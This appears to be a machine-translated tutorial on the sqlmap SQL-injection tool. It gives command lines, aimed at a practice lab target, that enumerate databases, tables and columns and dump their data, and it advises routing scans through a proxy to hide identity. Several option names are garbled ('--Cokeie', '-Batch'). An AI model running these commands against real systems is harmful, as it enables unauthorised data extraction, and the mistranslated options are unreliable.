Article Directory
Tool introduction
sqlmap is an automated SQL injection tool. Its main function is to automate scanning, discover and use SQL injection vulnerabilities in a given URL, and it has built-in many bypass plug-ins.
Supports almost all databases MySQL, Oracle, Microsoft SQL Server, Microsoft Access, IBM DB2, etc. now.
Support agents, optimize algorithms, and be more efficient.
Judge the database through fingerprint recognition technology.
Support downloading or uploading files when the database management system is MySQL, PostgreSQL or Microsoft SQL Server.
When the database management system is MySQL, PostgreSQL or Microsoft SQL Server, it supports executing arbitrary commands and echoing standard output.
SQLMAP mainly adopts the following 5 unique SQL injection techniques. (Also supports get, post, cookie injection)
- Boolean type blind injection, which is injected according to the true or false judgment condition of the returned page.
- Time blind note, when you can no longer judge any information based on the content returned by the page, use conditional statements to check whether the time delay statement has been executed (that is, whether the page return time has increased) to judge.
- Error injection, according to the error message returned by the page, or the result of the injected statement is directly returned to the leaf.
- Union query injection, injection when "union" can be used.
- Stacked query injection can be injected when multiple statements are executed at the same time.
Basic command
Precondition: the target has an injection point
sqlmap.py -u url address
Example:sqlmap.py -u http://192.168.0.1/sqli/Less-1/?id=1
When the parameters after the injection point are greater than two, the URL address needs to be enclosed in double quotes. For
example:sqlmap.py -u “http://192.168.0.1/sqli/Less-1/?id=1&uid=2”
The default lever level is 1, you can use -level to specify the level later
Get target
Connect directly to the database
sqlmap.py -u http://192.168.0.1/sqli/Less-1/?id=1
sqlmap -l parses the target in the log file (generally combined with Burp Suite tools to achieve automation and batch detection)
sqlmap -x parses the target from the remote xml file (not commonly used)
sqlmap -m scan multiple targets in the same text
sqlmap -r parses the target from an HTTP request (usually used when cookie injection exists)
Example: sqlmap.py -r /root/desktop/1.txt
sqlmap -g uses Google search results as the target to execute (the built-in features of Tianchao cannot be used)
Execute the test statement
Check the injection point:
sqlmap.py -u http://192.168.0.1/sqli/Less-1/?id=1
List database information:
sqlmap.py -u http://192.168.0.1/sqli/Less-1/?id=1 --dbs
Specify the library name to list all tables (-D can be written as -dbs):
sqlmap.py -u http://192.168.0.1/sqli/Less-1/?id=1 -D 数据库名 --tables
Specify the library name and table name to list all fields (-T can be written as -tables):
sqlmap.py -u http://192.168.0.1/sqli/Less-1/?id=1 -D 数据库名 -T 表名 --columns
Specify the library name and table name field to dump the specified field (dump download):
sqlmap.py -u http://192.168.0.1/sqli/Less-1/?id=1 -D 数据库名 -T 表名 -C 字段1,字段2,字段3 --dump
You don't need to check the database, you can directly dump-all the database. The disadvantage is that the data volume is large and the download is slow.
Extended sentence
There are several parameters that may be used, just add them directly at the end, and more parameters can be found in the official documentation
--Cokeie=COOKIE Where you need to log in, you need to use the cookie after logging in
--Proxy="http://127.0.0.1:8087" Use HTTP proxy to hide your identity, such as using goagen, etc.
--Sql-query=QUERY executes a SQL statement, but it may not be supported
-Batch executes Y by default, no need to manually select. When unattended, the automatic default selection "Y", intelligently selects the execution of an optimal command considered by SQLMAP.